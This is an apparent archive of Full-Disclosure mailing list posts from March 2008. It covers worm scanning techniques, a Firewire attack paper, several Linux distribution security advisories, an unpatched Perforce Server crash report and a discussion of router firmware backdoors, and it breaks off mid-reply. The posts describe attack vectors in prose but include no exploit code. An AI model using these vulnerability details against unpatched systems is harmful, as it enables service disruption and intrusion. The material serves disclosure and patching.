"Previous scanning worms, such as Code Red, spread via many threads, each invoking connect() to probe random addresses. Thus each thread's scanning rate was limited by network latency, the time required to transmit a TCP-SYN packet and wait for a response or timeout. In principle, worms can compensate for this latency by invoking a sufficiently large number of threads. However, in practice, context switch overhead is significant and there are insufficient resources to create enough threads to counteract the network delays -- the worm quickly stalls and becomes latency limited.

In contrast, Sapphire's scanner was limited by each compromised machine's bandwidth to the Internet. Since the SQL Server vulnerability was exploitable using a single packet to UDP port 1434, the worm was able to send these scans without requiring a response from the potential victim."

* http://www.caida.org/publications/papers/2003/sapphire/sapphire.html

(Oops, sorry for the copy to your inbox, Andrew.)

On 3/5/08, Andrew A wrote:
> hey dude, how is merely sending a single datagram not going to be faster
> than doing an entire handshake?
>
> On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer wrote:
>
> > This is not true. I doubt there is any measurable advantage
> > of UDP vs. TCP scans if you do it right.
> >
> >
> >
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From research at sec-consult.com Wed Mar 5 15:53:36 2008
From: research at sec-consult.com (Bernhard Mueller)
Date: Wed, 5 Mar 2008 15:53:36 +0000
Subject: [Full-disclosure] Firewire Attack on Windows Vista
Message-ID: <1204732416.6997.53.camel@b4byl0n>

Hello,

In the light of recent discussions about firewire / DMA hacks, we would like to throw in some of the results of our past research on this topic (done mainly by Peter Panholzer) in the form of a short whitepaper. In this paper, we demonstrate that the firewire unlock attack (as implemented in Adam Boileau's winlockpwn) can be used against Windows Vista.

The paper is available at:

http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf

Best regards,

Bernhard

--
_________________________________________

Bernhard Mueller
Security Consultant

SEC Consult Unternehmensberatung GmbH
www.sec-consult.com

A-1190 Vienna, Mooslackengasse 17

phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email b.mueller at sec-consult.com

Company register Wiener Neustadt: 227896t, VAT ID: ATU56165223
Registered office: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt

Advisor for your information security.

From hackbunny at s0ftpj.org Wed Mar 5 16:10:07 2008
From: hackbunny at s0ftpj.org (KJK::Hyperion)
Date: Wed, 05 Mar 2008 17:10:07 +0100
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com>
References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com>
Message-ID: <47CEC5DF.2030000@s0ftpj.org>

sub wrote:
> "Previous scanning worms, such as Code Red, spread via many threads,
> each invoking connect() to probe random addresses.

what the hell is this?
visiting the iniquity of the applications upon the protocols? Winsock is probably the only API that lets you connect() asynchronously (via the "non-standard" ConnectEx extension, but still). And if you have access to raw sockets, the whole point is moot because (IIRC) the advantages of SYN cookies work both ways

(Oops, sorry for the copy to your inbox, sub. Blame the mailing list administrators, Thunderbird's clunky UI and my laziness)

From sub at room641a.net Wed Mar 5 13:26:00 2008
From: sub at room641a.net (sub)
Date: Wed, 5 Mar 2008 08:26:00 -0500
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To:
References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>
Message-ID: <8805f1180803050526pccf8db2r5834d5113f400e2d@mail.gmail.com>

No, but if you're querying the services for data you do.

On 3/5/08, Dmitry wrote:
> dude, you don't need the entire handshake for tcp scanning.
>
>

From security at mandriva.com Wed Mar 5 19:32:25 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 05 Mar 2008 12:32:25 -0700
Subject: [Full-disclosure] [ MDVSA-2008:058 ] - Updated openldap packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2008:058
http://www.mandriva.com/security/
_______________________________________________________________________

Package : openldap
Date : March 5, 2008
Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

A vulnerability was found in slapo-pcache in slapd of OpenLDAP prior to 2.3.39 when running as a proxy-caching server.
It would allocate memory using a malloc variant rather than calloc, which prevented an array from being properly initialized and could possibly allow attackers to cause a denial of service (CVE-2007-5708).

Two vulnerabilities were found in how slapd handled modify (prior to 2.3.26) and modrdn (prior to 2.3.29) requests with NOOP control on objects stored in the BDB backend. An authenticated user with permission to perform modify (CVE-2007-6698) or modrdn (CVE-2008-0658) operations could cause slapd to crash.

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5708
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0658
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To
upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

From Thierry at Zoller.lu Wed Mar 5 18:29:58 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Wed, 5 Mar 2008 19:29:58 +0100
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <1204732416.6997.53.camel@b4byl0n>
References: <1204732416.6997.53.camel@b4byl0n>
Message-ID: <729632816.20080305192958@Zoller.lu>

Dear All,

That said the original work on this from metlstorm is in the news [1] and can be found here : http://storm.net.nz/projects/16

[1] http://it.slashdot.org/article.pl?sid=08/03/04/1258210&from=rss

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7

From rbu at gentoo.org Wed Mar 5 20:48:03 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Wed, 5 Mar 2008 21:48:03 +0100
Subject: [Full-disclosure] ERRATA: [ GLSA 200801-09 ] X.Org X server and Xfont library: Multiple vulnerabilities
Message-ID: <200803052148.03360.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [ERRATA UPDATE] GLSA 200801-09:03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: High
Title: X.Org X server and Xfont library: Multiple vulnerabilities
Date: January 20, 2008
Updated: March 05, 2008
Bugs: #204362, #208343
ID: 200801-09:03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The previous version of the X.Org X server (1.3.0.0-r4) did not properly address the integer overflow vulnerability in the MIT-SHM extension (CVE-2007-6429). It failed to check on Pixmaps of certain bit depths.

All users of the X.Org X server package should upgrade to x11-base/xorg-server-1.3.0.0-r5.

The corrected sections appear below.

Affected packages
=================

-------------------------------------------------------------------
   Package               /  Vulnerable  /   Unaffected
-------------------------------------------------------------------
1  x11-base/xorg-server     < 1.3.0.0-r5    >= 1.3.0.0-r5
2  x11-libs/libXfont        < 1.3.1-r1      >= 1.3.1-r1
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------

Resolution
==========

All X.Org X server users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=x11-base/xorg-server-1.3.0.0-r5"

All X.Org Xfont library users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=x11-libs/libXfont-1.3.1-r1"

References
==========

[ 1 ] CVE-2007-5760
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5760
[ 2 ] CVE-2007-5958
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5958
[ 3 ] CVE-2007-6427
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6427
[ 4 ] CVE-2007-6428
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6428
[ 5 ] CVE-2007-6429
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6429
[ 6 ] CVE-2008-0006
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0006
[ 7 ] X.Org security advisory
      http://lists.freedesktop.org/archives/xorg/2008-January/031918.html

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200801-09.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/122f755e/attachment.bin

From py at gentoo.org Wed Mar 5 21:42:36 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Wed, 05 Mar 2008 22:42:36 +0100
Subject: [Full-disclosure] [ GLSA 200803-10 ] lighttpd: Multiple vulnerabilities
Message-ID: <47CF13CC.4040909@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200803-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal
Title: lighttpd: Multiple vulnerabilities
Date: March 05, 2008
Bugs: #211230, #211956
ID: 200803-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in lighttpd.

Background
==========

lighttpd is a lightweight high-performance web server.

Affected packages
=================

-------------------------------------------------------------------
   Package               /  Vulnerable  /   Unaffected
-------------------------------------------------------------------
1  www-servers/lighttpd     < 1.4.18-r2     >= 1.4.18-r2

Description
===========

lighttpd contains a calculation error when allocating the global file descriptor array (CVE-2008-0983). Furthermore, it sends the source of a CGI script instead of returning a 500 error (Internal Server Error) when the fork() system call fails (CVE-2008-1111).

Impact
======

A remote attacker could exploit these vulnerabilities to cause a Denial of Service or gain the source of a CGI script.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All lighttpd users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/lighttpd-1.4.18-r2"

References
==========

[ 1 ] CVE-2008-0983
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0983
[ 2 ] CVE-2008-1111
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1111

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200803-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From kees at ubuntu.com Wed Mar 5 20:37:28 2008
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 5 Mar 2008 12:37:28 -0800
Subject: [Full-disclosure] [USN-583-1] Evolution vulnerability
Message-ID: <20080305203728.GF27247@outflux.net>

===========================================================
Ubuntu Security Notice USN-583-1 March 05, 2008
evolution vulnerability
CVE-2008-0072
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  evolution 2.6.1-0ubuntu7.2

Ubuntu 6.10:
  evolution 2.8.1-0ubuntu4.2

Ubuntu 7.04:
  evolution 2.10.1-0ubuntu2.1

Ubuntu 7.10:
  evolution 2.12.1-0ubuntu1.1

After a standard system upgrade you need to restart Evolution to effect the necessary changes.

Details follow:

Ulf Harnhammar discovered that Evolution did not correctly handle format strings when processing encrypted emails. A remote attacker could exploit this by sending a specially crafted email, resulting in arbitrary code execution.

Updated packages for Ubuntu 6.06 LTS:

From aluigi at autistici.org Wed Mar 5 20:59:59 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Wed, 5 Mar 2008 21:59:59 +0100
Subject: [Full-disclosure] Multiple vulnerabilities in Perforce Server 2007.3/143793
Message-ID: <20080305215959.476b282a.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  Perforce Server
              http://www.perforce.com
Versions:     <= 2007.3/143793
Platforms:    Windows, Unix, Linux and Mac
Bugs:         NULL pointers, invalid memory access and endless loop
Exploitation: remote
Date:         05 Mar 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:
"Perforce SCM (Software Configuration Management)
versions and manages source code and digital assets for enterprises
large and small."

#######################################################################

=======
2) Bugs
=======

The Perforce server is affected by multiple vulnerabilities which allow
any unauthenticated attacker to crash the server or consume all its
resources.

The first type of vulnerabilities includes the NULL pointers generated
by the absence of some parameters in the client's request and the lack
of checks on the pointers returned by the functions which get these
values from the packets.
The commands affected by these NULL pointer vulnerabilities are the
following: dm-FaultFile, dm-LazyCheck, dm-ResolvedFile, dm-OpenFile,
crypto and possibly others.

A secondary type of vulnerabilities is exploitable through the
server-DiffFile and server-ReleaseFile commands; in this case the
problem is caused by the 32 bit number provided by the client which is
used as the amount of elements in the initialization of an array.

Another problem is then exploitable again with a malformed
server-DiffFile command and allows forcing the server into an endless
loop which will cause its termination after having consumed all the
memory and the resources of the system.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/perforces.zip

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From security at mandriva.com Wed Mar 5 22:04:46 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 05 Mar 2008 15:04:46 -0700
Subject: [Full-disclosure] [ MDVSA-2008:059 ] - Updated tcl packages fix vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:059
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : tcl
 Date    : March 5, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 A flaw in the Tcl regular expression handling engine was originally
 discovered by Will Drewry in the PostgreSQL database server's Tcl
 regular expression engine.  This flaw can result in an infinite loop
 when processing certain regular expressions.

 The updated packages have been patched to correct these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4772
 _______________________________________________________________________

 Updated Packages:
 _______________________________________________________________________

 To upgrade
 automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFHzu0hmqjQ0CJFipgRAu/NAJ9HlV2actdS3759zWv52I2E0WXfmACfZ2qG
ECG/JHPiF9WC6uUiU76BKpw=
=g0B/
-----END PGP SIGNATURE-----

From py at gentoo.org Wed Mar 5 22:50:27 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Wed, 05 Mar 2008 23:50:27 +0100
Subject: [Full-disclosure] [ GLSA 200803-11 ] Vobcopy: Insecure temporary file creation
Message-ID: <47CF23B3.9040808@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Vobcopy: Insecure temporary file creation
      Date: March 05, 2008
      Bugs: #197578
        ID: 200803-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Vobcopy uses temporary files in an insecure manner, allowing for a
symlink attack.

Background
==========

Vobcopy is a tool for decrypting and copying DVD .vob files to a hard
disk.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  media-video/vobcopy      < 1.1.0                         >= 1.1.0

Description
===========

Joey Hess reported that vobcopy appends data to the file
"/tmp/vobcopy.bla" in an insecure manner.

Impact
======

A local attacker could exploit this vulnerability to conduct symlink
attacks and append data to arbitrary files with the privileges of the
user running Vobcopy.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Vobcopy users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/vobcopy-1.1.0"

References
==========

  [ 1 ] CVE-2007-5718
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5718

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-11.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzyOzuhJ+ozIKI5gRAsIRAJ96E0AKomLaheEMTTVpXv/sOxU77QCeORsz
STMU3XJAKjrHur+Tihd5ZFU=
=gtMw
-----END PGP SIGNATURE-----

From py at gentoo.org Wed Mar 5 23:01:11 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Thu, 06 Mar 2008 00:01:11 +0100
Subject: [Full-disclosure] [ GLSA 200803-12 ] Evolution: Format string vulnerability
Message-ID: <47CF2637.5060903@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Evolution: Format string vulnerability
      Date: March 05, 2008
      Bugs: #212272
        ID: 200803-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A format string error has been discovered in Evolution, possibly
resulting in the execution of arbitrary code.

Background
==========

Evolution is a GNOME groupware application.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  mail-client/evolution     < 2.12.3-r1                >= 2.12.3-r1

Description
===========

Ulf Harnhammar from Secunia Research discovered a format string error
in the emf_multipart_encrypted() function in the file mail/em-format.c
when reading certain data (e.g. the "Version:" field) from an encrypted
e-mail.

Impact
======

A remote attacker could entice a user to open a specially crafted
encrypted e-mail, potentially resulting in the execution of arbitrary
code with the privileges of the user running Evolution.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Evolution users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=mail-client/evolution-2.12.3-r1"

References
==========

  [ 1 ] CVE-2008-0072
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0072

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-12.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzyY3uhJ+ozIKI5gRAlYJAJ0bS23P4HSxo13IpHXm89eYBg5CkQCggvwY
UdMbR+mlmHFpuPT+wFmZIMw=
=cJHw
-----END PGP SIGNATURE-----

From security at mandriva.com Wed Mar 5 22:57:42 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 05 Mar 2008 15:57:42 -0700
Subject: [Full-disclosure] [ MDVSA-2008:060 ] - Updated Joomla!
 packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:060
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : joomla
 Date    : March 5, 2008
 Affected: 2007.0, 2007.1, 2008.0
 _______________________________________________________________________

 Problem Description:

 Several severe security issues were discovered in the Joomla! PHP-based
 content management system.  These issues have been fixed in version
 1.0.15 which is provided with this update.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6642
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6643
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6644
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6645
 _______________________________________________________________________

 Updated Packages:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFHzvqImqjQ0CJFipgRAjvlAJwIKwHr0x5/6wiPTmK3B0r7Iob4eQCbB66Z
eFHu6uuC341v9eOjiKx+Vyg=
=xIQy
-----END PGP SIGNATURE-----

From ivanhec at gmail.com Wed Mar 5 23:09:53 2008
From: ivanhec at gmail.com (Ivan .)
Date: Thu, 6 Mar 2008 10:09:53 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" Message-ID: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html From jamie at canonical.com Wed Mar 5 22:46:06 2008 From: jamie at canonical.com (Jamie Strandboge) Date: Wed, 5 Mar 2008 17:46:06 -0500 Subject: [Full-disclosure] [USN-584-1] OpenLDAP vulnerabilities Message-ID: <20080305224606.GB9735@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-584-1 March 05, 2008 openldap2.2, openldap2.3 vulnerabilities CVE-2007-6698, CVE-2008-0658 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: slapd 2.2.26-5ubuntu2.6 Ubuntu 6.10: slapd 2.2.26-5ubuntu3.3 Ubuntu 7.04: slapd 2.3.30-2ubuntu0.2 Ubuntu 7.10: slapd 2.3.35-1ubuntu0.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Jonathan Clarke discovered that the OpenLDAP slapd server did not properly handle modify requests when using the Berkeley DB backend and the NOOP control was used. An authenticated user with modify permissions could send a crafted modify request and cause a denial of service via application crash. Ubuntu 7.10 is not affected by this issue. (CVE-2007-6698) Ralf Haferkamp discovered that the OpenLDAP slapd server did not properly handle modrdn requests when using the Berkeley DB backend and the NOOP control was used. An authenticated user with modrdn permissions could send a crafted modrdn request and possibly cause a denial of service via application crash. 
(CVE-2007-6698) Updated packages for Ubuntu 6.06 LTS, Ubuntu 6.10, Ubuntu 7.04 and Ubuntu 7.10: Source archives; amd64, i386, powerpc and sparc architectures. -------------- next part -------------- A non-text attachment was scrubbed...
From coderman at gmail.com Wed Mar 5 23:51:26 2008 From: coderman at gmail.com (coderman) Date: Wed, 5 Mar 2008 15:51:26 -0800 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> Message-ID: <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> On Wed, Mar 5, 2008 at 3:09 PM, Ivan . wrote: > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html they also pwned my toothpaste and gave me diarrhea :( :( :( H A C K E D B Y C H I N E S E, LOLOLOLOLOL titan rain is dark comedy at its finest! (( how many orgs / govs actually do due diligence and audit third party hardware / software / systems they purchase ?? )) From ivanhec at gmail.com Thu Mar 6 00:07:09 2008 From: ivanhec at gmail.com (Ivan .) Date: Thu, 6 Mar 2008 11:07:09 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> Message-ID: <6450e99d0803051607q1192a8f2yc7bc072b84f21dc2@mail.gmail.com> wouldn't be the first time that National intelligence agencies have comprised IT gear http://en.wikipedia.org/wiki/Crypto_AG On Thu, Mar 6, 2008 at 10:51 AM, coderman wrote: > On Wed, Mar 5, 2008 at 3:09 PM, Ivan . wrote: > > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > they also pwned my toothpaste and gave me diarrhea :( :( :( > > H A C K E D B Y C H I N E S E, LOLOLOLOLOL > > titan rain is dark comedy at its finest!
> > (( how many orgs / govs actually do due diligence and audit third > party hardware / software / systems they purchase ?? )) > From coderman at gmail.com Thu Mar 6 00:20:02 2008 From: coderman at gmail.com (coderman) Date: Wed, 5 Mar 2008 16:20:02 -0800 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <6450e99d0803051607q1192a8f2yc7bc072b84f21dc2@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> <6450e99d0803051607q1192a8f2yc7bc072b84f21dc2@mail.gmail.com> Message-ID: <4ef5fec60803051620s6d7fd7f7j2c92601765375730@mail.gmail.com> On Wed, Mar 5, 2008 at 4:07 PM, Ivan . wrote: > wouldn't be the first time that National intelligence agencies have > comprised IT gear true; i just meant that an elaborate back door isn't even necessary when the front door lock can be bumped open (titan rain :) the athens affair is another fun example of the folly of running arbitrary and un tested / audited code on your infrastructure... http://spectrum.ieee.org/print/5280 From worriedsecurity at googlemail.com Thu Mar 6 00:25:52 2008 From: worriedsecurity at googlemail.com (worried security) Date: Thu, 6 Mar 2008 00:25:52 +0000 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> Message-ID: <67ea64530803051625p4f5065a5q48c848beeb3f6ddf@mail.gmail.com> On Wed, Mar 5, 2008 at 11:51 PM, coderman wrote: > On Wed, Mar 5, 2008 at 3:09 PM, Ivan . wrote: > > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > they also 